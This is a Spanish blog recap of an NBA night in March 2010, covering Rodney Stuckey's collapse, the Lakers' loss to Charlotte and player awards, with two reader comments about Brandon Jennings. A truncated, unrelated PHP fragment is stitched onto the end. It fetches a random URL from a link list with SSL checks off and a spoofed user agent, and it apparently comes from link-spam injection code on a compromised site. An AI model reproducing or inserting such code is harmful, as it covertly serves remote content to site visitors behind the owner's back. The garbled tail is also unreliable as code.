La Crónica (05/03/2010)

06 de March de 2010 por txusma

Con los precedentes que tenemos en el mundo del fútbol en este país no hemos podido evitar alarmanos cuando hemos leído el desvanecimiento que ha sufrido Rodney Stuckey en el partido Pistons – Cavs. A finales del tercer cuarto Stuckey se ha sentido mareado y al pedir un poco de agua se ha desplomado sobre un miembro del equipo técnico de Detroit. Después de eso ha sido trasladado rápidamente al hospital. Ahora nos enteramos que no es la primera vez que le sucede algo similar, así que desde aquí le deseamos una printa recuperación y esperamos que no sea nada grave y podamos disfrutar nuevamente de su calidad.

Ciñéndonos estrictamente al ámbito deportivo la noticia destacada de la jornada es, sin duda, la derrota de los Lakers en casa de unos correosos Bobcats que han ahogado el juego ofensivo de los amarillos. Kobe y sus compañeros han acabado con un 36% de acierto en el tiro, prueba fehaciente de lo que es capaz el  equipo entrenado por Larry Brown.

La victoria de Charlotte ha sido la única sorpresa de una jornada que, en el resto de partidos,  ha transcurrido siguiendo el guión previsto. Victorias de Cleveland, Boston, Orlando y Atlanta que mantienen posiciones en las 4 primeros puestos de la Conferencia Este. Y en el Oeste, triunfo de Mavs (y ya van 10 seguidos), Nuggets,  Thunder y Spurs. Estos últimos le han ganado a New Orleans que parece alejarse definitivamente de la post-temporada.

En los otros 2 partidos de la jornada, victoria de los Raptors frente a New York, con Calderóny Sergio  jugando muy buenos partidos, y victoria de los Bucks frente los Wizards.

PREMIOS

MVP: El premio se lo merecen, sin duda, Lebron James y sus 40 puntos, 13 rebotes y 6 asistencias pero los partidos de Stephen Curry (31 puntos, 11 asistencias), Josh Smith (25-9-3 y 3 tapones), Dirk Nowitzki (31-12 y 3 tapones) y Carmelo Anthony (34-6-4) también son dignísimos de mención.

Rookie: Como ya hemos comentado Stephen Curry le puede discutir el MVP al mismísimo Lebron James pero hoy, a parte de la pareja de rookies de New Orleans, también han destacado James Harden con 17 puntos, 3 rebotes y 4 asistencias, Tyreke Evans (20 puntos, 6 asistencias pero 6 pérdidas) y Rodrigue Beabois (22 puntos) que se está ganando partido a partido que le empecemos a seguir de cerca.

Sorpresa: Partidazo de Sonny Weems que le roba minutos a DeRozan. 20 puntos y 9 rebotes saliendo desde el banco.

Decepción: Ni Rookie Wall, ni leches. Los últimos meses de Brandon Jennings son absolutamente deplorables. Anoche 4 puntitos con un 2 de 7 en tiro. Tal vez en esta fase de la temporada debería centrarse más en repartir juego (que lo hace muy bien) y menos en mirar aro. Otro buen partidito se ha marcado Pedja Stojakovic: 3 puntos con un 1 de 10.

Esfuerzo en vano: 32 puntos del clásico Danny Granger, 22-9-7 de David West, 23 puntos y 18 rebotes de David Lee… Grandes actuaciones sin recompensa. ¿No se cansan?

Comenta

2 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Si tirar 7 veces a canasta es mirar mucho al aro que baje Jordan y lo vea. En 2010 el promedio de tiros lanzados de Jennings es de 13.2 tiros por noche, siendo la máxima referencia exterior si hay que ponerle algun calificativo es el de pocos tiros, y desde que llegó Salmons menos aun. Y el promedio de asistencias en esos mismos partidos es de 6.1.

    Desde luego ha notado el paso de los partidos, pero decir deprorable es mucho decir.

      Citar

  2. Txusma dice:
    #2

    La decepción no es solo por esta noche sino por los últimos meses. Su porcentaje de acierto esta temporada es del 36% y su media de tiros intentados es de 15.4. Pero espera pq su acierto en los 2 partidos que ha jugado en marzo es del 21%, en febrero fue del 30% y en enero del 32%. Si quieres le aplaudo o algo…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>